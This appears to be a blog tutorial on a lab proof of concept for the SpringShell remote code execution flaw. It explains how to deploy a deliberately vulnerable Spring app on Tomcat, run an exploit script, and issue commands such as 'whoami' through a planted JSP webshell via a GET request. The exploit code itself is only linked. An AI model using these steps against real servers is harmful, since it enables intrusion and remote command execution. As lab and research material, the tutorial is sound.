code

Thursday, March 31, 2022

Complete SpringShell RCE Exploit PoC and Vulnerable App


I present here a complete tutorial and POC for rcent SpringShell vulnerability for Spring Core module.

 


Running on Ubuntu (tested on 20.04) 

Github: https://github.com/agentzex/spring-shell-exploit-poc

Prerequisites:

App Preparation:

  • Download the spring web app from the 'app' directory in this repo
  • cd to it and run 'mvn package'
  • after it's done, cd to 'target' directory which was created and copy the 'zex-poc.war' file

Deployment: tomcat-root-dir - should be '/opt/tomcat/' if you followed the above guide.

  • If you're running tomcat < 10 : copy the war file to 'tomcat-root-dir/webapps/'
  • If you're running tomcat 10:
    1. create a directory named 'webapps-javaee' in tomcat-root-dir
    2. copy the war file to this directory
    3. Tomcat will migrate the legacy J2EE war file automatically from that folder and will deploy it in tomcat-root-dir/webapps/'
  • Run tomcat with tomcat-root-dir/bin/catalina.sh run' and check for errors.
  • If everything worked, we can now run the poc.py file and access a browser to launch commands in the created webshell.
    1. Run python (or python3) pwn.py --url http://server.ip:8080/zex-poc/greeting
    2. Access via browser or other http client with GET: http://server.ip:8080/zex-poc/tomcatwar.jsp?pwd=j&cmd=whoami
    3. PWND

Black Mirror Season 7 - "Plaything" Easter eggs, where it fits in Tuckersoft and TCKR systems universe and Bandersnatch connection

    AI is going to end the world as we know it, but not in the way you think. In the past few days, I had the chance to play a new game ...